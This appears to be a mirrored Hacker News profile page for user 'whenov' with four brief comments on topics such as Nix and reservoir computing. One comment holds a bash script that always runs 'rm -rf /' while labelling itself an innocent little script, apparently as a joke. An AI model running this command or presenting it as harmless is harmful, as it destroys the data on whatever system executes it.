Viewing profile — whenov
whenov
HN member- Joined
- Fri, May 29, 2015, 11:38 AM UTC
- HN karma
- 20
- Public activity
- 4 items
- HN profile
- View on Hacker News ↗
About whenov
No profile information was provided.
Recent public activity
-
comment
Comment #18869673
That’s good to know, thanks for sharing!
-
comment
Comment #18864134
However, Nix requires you to create a /nix directory, which is not possible in some cases.
-
comment
Comment #13100227
Is ELM reservoir computing?
-
comment
Comment #11052183
#!/bin/bash touch x if [ -f "x" ]; then rm -rf / else echo "I'm just an innocent little script." fi